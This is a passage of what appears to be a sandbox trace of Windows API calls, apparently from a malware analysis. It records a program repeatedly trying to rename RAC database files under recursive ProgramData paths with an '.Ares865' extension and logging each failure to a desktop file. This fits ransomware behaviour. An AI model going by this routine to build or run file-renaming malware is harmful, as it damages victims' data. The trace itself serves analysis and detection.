Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 96 [0053.669] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.669] GetLastError () returned 0x20 [0053.669] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 118 [0053.669] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 118 [0053.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.669] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1df8 [0053.669] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x76, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x76, lpOverlapped=0x0) returned 1 [0053.670] CloseHandle (hObject=0x12c) returned 1 [0053.670] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.670] CloseHandle (hObject=0x0) returned 0 [0053.670] CloseHandle (hObject=0x0) returned 0 [0053.670] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.671] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 103 [0053.671] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.671] GetLastError () returned 0x20 [0053.671] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 125 [0053.671] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 125 [0053.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.671] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1e6e [0053.671] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x7d, lpOverlapped=0x0) returned 1 [0053.671] CloseHandle (hObject=0x12c) returned 1 [0053.672] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.672] CloseHandle (hObject=0x0) returned 0 [0053.672] CloseHandle (hObject=0x0) returned 0 [0053.672] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.672] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.672] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0053.703] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 113 [0053.704] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.704] GetLastError () returned 0x20 [0053.704] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 135 [0053.704] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 135 [0053.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.704] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1eeb [0053.704] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x87, lpOverlapped=0x0) returned 1 [0053.704] CloseHandle (hObject=0x12c) returned 1 [0053.705] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.705] CloseHandle (hObject=0x0) returned 0 [0053.705] CloseHandle (hObject=0x0) returned 0 [0053.705] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.705] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 120 [0053.706] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.706] GetLastError () returned 0x20 [0053.706] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 142 [0053.706] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 142 [0053.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.706] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1f72 [0053.706] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x8e, lpOverlapped=0x0) returned 1 [0053.706] CloseHandle (hObject=0x12c) returned 1 [0053.707] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.707] CloseHandle (hObject=0x0) returned 0 [0053.707] CloseHandle (hObject=0x0) returned 0 [0053.707] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.707] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.707] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0053.741] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 130 [0053.741] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.742] GetLastError () returned 0x20 [0053.742] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 152 [0053.742] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 152 [0053.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.742] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2000 [0053.742] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x98, lpOverlapped=0x0) returned 1 [0053.742] CloseHandle (hObject=0x12c) returned 1 [0053.743] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.743] CloseHandle (hObject=0x0) returned 0 [0053.743] CloseHandle (hObject=0x0) returned 0 [0053.743] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.744] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 137 [0053.744] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.744] GetLastError () returned 0x20 [0053.744] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 159 [0053.744] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 159 [0053.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.744] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2098 [0053.744] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x9f, lpOverlapped=0x0) returned 1 [0053.744] CloseHandle (hObject=0x12c) returned 1 [0053.745] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.745] CloseHandle (hObject=0x0) returned 0 [0053.745] CloseHandle (hObject=0x0) returned 0 [0053.745] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.745] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.745] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0053.887] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 147 [0053.887] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.887] GetLastError () returned 0x20 [0053.888] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 169 [0053.888] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 169 [0053.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.888] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2137 [0053.888] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xa9, lpOverlapped=0x0) returned 1 [0053.888] CloseHandle (hObject=0x12c) returned 1 [0053.889] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.889] CloseHandle (hObject=0x0) returned 0 [0053.889] CloseHandle (hObject=0x0) returned 0 [0053.889] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.889] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 154 [0053.889] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.890] GetLastError () returned 0x20 [0053.890] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 176 [0053.890] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 176 [0053.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.890] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x21e0 [0053.890] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xb0, lpOverlapped=0x0) returned 1 [0053.890] CloseHandle (hObject=0x12c) returned 1 [0053.891] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.891] CloseHandle (hObject=0x0) returned 0 [0053.891] CloseHandle (hObject=0x0) returned 0 [0053.891] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.891] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.891] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2448 [0053.933] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 164 [0053.933] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.933] GetLastError () returned 0x20 [0053.933] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 186 [0053.933] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 186 [0053.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.933] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2290 [0053.933] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xba, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xba, lpOverlapped=0x0) returned 1 [0053.933] CloseHandle (hObject=0x12c) returned 1 [0053.934] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.934] CloseHandle (hObject=0x0) returned 0 [0053.934] CloseHandle (hObject=0x0) returned 0 [0053.934] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.934] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 171 [0053.934] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: 